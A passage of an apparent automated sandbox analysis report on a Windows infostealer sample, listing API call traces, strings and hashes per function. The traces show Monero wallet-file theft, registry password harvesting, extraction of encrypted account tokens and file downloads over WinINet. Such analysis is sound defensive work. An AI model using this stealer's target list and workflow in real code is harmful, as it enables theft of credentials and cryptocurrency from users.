                    • Part of subcall function 002E99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 002E9A11
                    • Part of subcall function 002E99C0: LocalAlloc.KERNEL32(00000040,?), ref: 002E9A31
                    • Part of subcall function 002E99C0: ReadFile.KERNEL32(000000FF,?,00000000,002E148F,00000000), ref: 002E9A5A
                    • Part of subcall function 002E99C0: LocalFree.KERNEL32(002E148F), ref: 002E9A90
                    • Part of subcall function 002E99C0: CloseHandle.KERNEL32(000000FF), ref: 002E9A9A
                    • Part of subcall function 002F93C0: GlobalAlloc.KERNEL32(00000000,002F43DD,002F43DD), ref: 002F93D3
                  • StrStrA.SHLWAPI(?,0132EC00), ref: 002F43F3
                  • GlobalFree.KERNEL32(?), ref: 002F4512
                    • Part of subcall function 002E9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N.,00000000,00000000), ref: 002E9AEF
                    • Part of subcall function 002E9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,002E4EEE,00000000,?), ref: 002E9B01
                    • Part of subcall function 002E9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N.,00000000,00000000), ref: 002E9B2A
                    • Part of subcall function 002E9AC0: LocalFree.KERNEL32(?,?,?,?,002E4EEE,00000000,?), ref: 002E9B3F
                  • lstrcat.KERNEL32(?,00000000), ref: 002F44A3
                  • StrCmpCA.SHLWAPI(?,003008D1), ref: 002F44C0
                  • lstrcat.KERNEL32(00000000,00000000), ref: 002F44D2
                  • lstrcat.KERNEL32(00000000,?), ref: 002F44E5
                  • lstrcat.KERNEL32(00000000,00300FB8), ref: 002F44F4
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                  • String ID:
                  • API String ID: 3541710228-0
                  • Opcode ID: 87c9f2529efd6835c7d7df09de57e03ec5ab96beed1be8ef914270b2d9743162
                  • Instruction ID: 9f73014124db7ec70133ada5d47f2e1b2ba499392f77ac1b3cbd381d7aa81e6b
                  • Opcode Fuzzy Hash: 87c9f2529efd6835c7d7df09de57e03ec5ab96beed1be8ef914270b2d9743162
                  • Instruction Fuzzy Hash: A67167B6910208ABDB14FBA0DC95FFEB379AF58300F4045A8F605A7181EA74DB59CF91
                  Function 002E1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002E12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 002E12B4
                    • Part of subcall function 002E12A0: RtlAllocateHeap.NTDLL(00000000), ref: 002E12BB
                    • Part of subcall function 002E12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 002E12D7
                    • Part of subcall function 002E12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 002E12F5
                    • Part of subcall function 002E12A0: RegCloseKey.ADVAPI32(?), ref: 002E12FF
                  • lstrcat.KERNEL32(?,00000000), ref: 002E134F
                  • lstrlen.KERNEL32(?), ref: 002E135C
                  • lstrcat.KERNEL32(?,.keys), ref: 002E1377
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                    • Part of subcall function 002FA9B0: lstrlen.KERNEL32(?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002FA9C5
                    • Part of subcall function 002FA9B0: lstrcpy.KERNEL32(00000000), ref: 002FAA04
                    • Part of subcall function 002FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002FAA12
                    • Part of subcall function 002FA8A0: lstrcpy.KERNEL32(?,00300E17), ref: 002FA905
                    • Part of subcall function 002F8B60: GetSystemTime.KERNEL32(00300E1A,01329C18,003005AE,?,?,002E13F9,?,0000001A,00300E1A,00000000,?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002F8B86
                    • Part of subcall function 002FA920: lstrcpy.KERNEL32(00000000,?), ref: 002FA972
                    • Part of subcall function 002FA920: lstrcat.KERNEL32(00000000), ref: 002FA982
                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 002E1465
                    • Part of subcall function 002FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002FA7E6
                    • Part of subcall function 002E99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E99EC
                    • Part of subcall function 002E99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 002E9A11
                    • Part of subcall function 002E99C0: LocalAlloc.KERNEL32(00000040,?), ref: 002E9A31
                    • Part of subcall function 002E99C0: ReadFile.KERNEL32(000000FF,?,00000000,002E148F,00000000), ref: 002E9A5A
                    • Part of subcall function 002E99C0: LocalFree.KERNEL32(002E148F), ref: 002E9A90
                    • Part of subcall function 002E99C0: CloseHandle.KERNEL32(000000FF), ref: 002E9A9A
                  • DeleteFileA.KERNEL32(00000000), ref: 002E14EF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                  • API String ID: 3478931302-218353709
                  • Opcode ID: 790383cf05a7020f97398057918822b0bf8af8d89cfe0de07f365e3d726a837d
                  • Instruction ID: cc3e64108f063e2b6cfc28407b6a0c60f2663e8db399746b7c67d4104c9fce36
                  • Opcode Fuzzy Hash: 790383cf05a7020f97398057918822b0bf8af8d89cfe0de07f365e3d726a837d
                  • Instruction Fuzzy Hash: 215120B196011957CB15EB60DD92AEDB33CAF54740F4041B8B70A62091EE706B9ACEA6
                  Function 002E75D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002E72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 002E733A
                    • Part of subcall function 002E72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 002E73B1
                    • Part of subcall function 002E72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 002E740D
                    • Part of subcall function 002E72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 002E7452
                    • Part of subcall function 002E72D0: HeapFree.KERNEL32(00000000), ref: 002E7459
                  • lstrcat.KERNEL32(00000000,003017FC), ref: 002E7606
                  • lstrcat.KERNEL32(00000000,00000000), ref: 002E7648
                  • lstrcat.KERNEL32(00000000, : ), ref: 002E765A
                  • lstrcat.KERNEL32(00000000,00000000), ref: 002E768F
                  • lstrcat.KERNEL32(00000000,00301804), ref: 002E76A0
                  • lstrcat.KERNEL32(00000000,00000000), ref: 002E76D3
                  • lstrcat.KERNEL32(00000000,00301808), ref: 002E76ED
                  • task.LIBCPMTD ref: 002E76FB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                  • String ID: :
                  • API String ID: 2677904052-3653984579
                  • Opcode ID: 453d9772eb43b2704f28d88fd4024e7860d093b3c917eae077b7ee35c0118e79
                  • Instruction ID: ca73b758eb7d291b7d61d7eeb88d2e0a42187133ddb9a9e00f399f16605ac8fa
                  • Opcode Fuzzy Hash: 453d9772eb43b2704f28d88fd4024e7860d093b3c917eae077b7ee35c0118e79
                  • Instruction Fuzzy Hash: 0D318772D20109DBCB19EBA5DC95EFE7378AF55301B504018F106A7290CB34AA5BDF62
                  Function 002F8100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0132EA38,00000000,?,00300E2C,00000000,?,00000000), ref: 002F8130
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002F8137
                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 002F8158
                  • __aulldiv.LIBCMT ref: 002F8172
                  • __aulldiv.LIBCMT ref: 002F8180
                  • wsprintfA.USER32 ref: 002F81AC
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                  • String ID: %d MB$@
                  • API String ID: 2774356765-3474575989
                  • Opcode ID: e354c33b4622efad88d7362a8ca821de552cfa65eee70b0a5af80e8b619acc93
                  • Instruction ID: ce513f3b60ec6cfc6b13d84ba25582003d27e321e39a54cfa0d8203525d3d2fd
                  • Opcode Fuzzy Hash: e354c33b4622efad88d7362a8ca821de552cfa65eee70b0a5af80e8b619acc93
                  • Instruction Fuzzy Hash: F42127B1E54208ABDB10DFD4CC49FAEF7B8EB48B40F104219F705AB280D7B869158BA5
                  Function 002E60A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002FA7E6
                    • Part of subcall function 002E47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 002E4839
                    • Part of subcall function 002E47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 002E4849
                  • InternetOpenA.WININET(00300DF7,00000001,00000000,00000000,00000000), ref: 002E610F
                  • StrCmpCA.SHLWAPI(?,0132F360), ref: 002E6147
                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 002E618F
                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 002E61B3
                  • InternetReadFile.WININET(?,?,00000400,?), ref: 002E61DC
                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 002E620A
                  • CloseHandle.KERNEL32(?,?,00000400), ref: 002E6249
                  • InternetCloseHandle.WININET(?), ref: 002E6253
                  • InternetCloseHandle.WININET(00000000), ref: 002E6260
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                  • String ID:
                  • API String ID: 2507841554-0
                  • Opcode ID: f0fc27553d0072877a821f0eb0a24eee9ce1d7bb48c0d75a054f848b7d3c3c6a
                  • Instruction ID: a357e9fe89a9d80c81948f67d92c969ca04d5e79daff2a6588e42d8f2dbe45ce
                  • Opcode Fuzzy Hash: f0fc27553d0072877a821f0eb0a24eee9ce1d7bb48c0d75a054f848b7d3c3c6a
                  • Instruction Fuzzy Hash: 6351B2B1950209ABDF20DF51DC49BEEB7B8EF14740F4080A8B709A71C0DBB46A99CF95
                  Function 002E72D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 002E733A
                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 002E73B1
                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 002E740D
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 002E7452
                  • HeapFree.KERNEL32(00000000), ref: 002E7459
                  • task.LIBCPMTD ref: 002E7555
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$EnumFreeOpenProcessValuetask
                  • String ID: Password
                  • API String ID: 775622407-3434357891
                  • Opcode ID: f4a23e9eb93533f0b7054a52ba92c65f700de5852eab8b64dbc2a90c47c3694f
                  • Instruction ID: 50135a90ec1f44d7df87e7734ac05e1ed9c088c054e62442349cc33c6a5b2556
                  • Opcode Fuzzy Hash: f4a23e9eb93533f0b7054a52ba92c65f700de5852eab8b64dbc2a90c47c3694f
                  • Instruction Fuzzy Hash: 8A614CB58502989BDB24DF50CC51BDAB7B8BF44300F4081E9E689A6181EBB05FD9CFA1
                  Function 002EBA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                    • Part of subcall function 002FA9B0: lstrlen.KERNEL32(?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002FA9C5
                    • Part of subcall function 002FA9B0: lstrcpy.KERNEL32(00000000), ref: 002FAA04
                    • Part of subcall function 002FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002FAA12
                    • Part of subcall function 002FA920: lstrcpy.KERNEL32(00000000,?), ref: 002FA972
                    • Part of subcall function 002FA920: lstrcat.KERNEL32(00000000), ref: 002FA982
                    • Part of subcall function 002FA8A0: lstrcpy.KERNEL32(?,00300E17), ref: 002FA905
                    • Part of subcall function 002FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002FA7E6
                  • lstrlen.KERNEL32(00000000), ref: 002EBC9F
                    • Part of subcall function 002F8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 002F8E52
                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 002EBCCD
                  • lstrlen.KERNEL32(00000000), ref: 002EBDA5
                  • lstrlen.KERNEL32(00000000), ref: 002EBDB9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                  • API String ID: 3073930149-1079375795
                  • Opcode ID: 03d8ebdfa6cb1f217a7531c24a31534858160c2f24fae08b6390a372dfb4ce32
                  • Instruction ID: d3c63fdbf1bf32c7c52612be3ea3c2b30e1766199e448b177675b95de9fe74d9
                  • Opcode Fuzzy Hash: 03d8ebdfa6cb1f217a7531c24a31534858160c2f24fae08b6390a372dfb4ce32
                  • Instruction Fuzzy Hash: 30B124B192010C9BDB14FBA0DD56DFEB378AF54780F404178F60AA6091EF746A69CF62
                  Function 002F6770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitProcess$DefaultLangUser
                  • String ID: *
                  • API String ID: 1494266314-163128923
                  • Opcode ID: d1ce8044161a785537e28236497fb8b0f7627a7eb3302d2e3c2bfe3249ece6c8
                  • Instruction ID: b1dcbfef014feeb2b22bbb5b261b872f53c49222559373d1596f33e25462c7bf
                  • Opcode Fuzzy Hash: d1ce8044161a785537e28236497fb8b0f7627a7eb3302d2e3c2bfe3249ece6c8
                  • Instruction Fuzzy Hash: AFF03A30904209EFD354AFE0A90DB2CBB70FF26702F0801A8E609C6290D6704A53AB9A
                  Function 002E4FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 002E4FCA
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002E4FD1
                  • InternetOpenA.WININET(00300DDF,00000000,00000000,00000000,00000000), ref: 002E4FEA
                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 002E5011
                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 002E5041
                  • InternetCloseHandle.WININET(?), ref: 002E50B9
                  • InternetCloseHandle.WININET(?), ref: 002E50C6
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
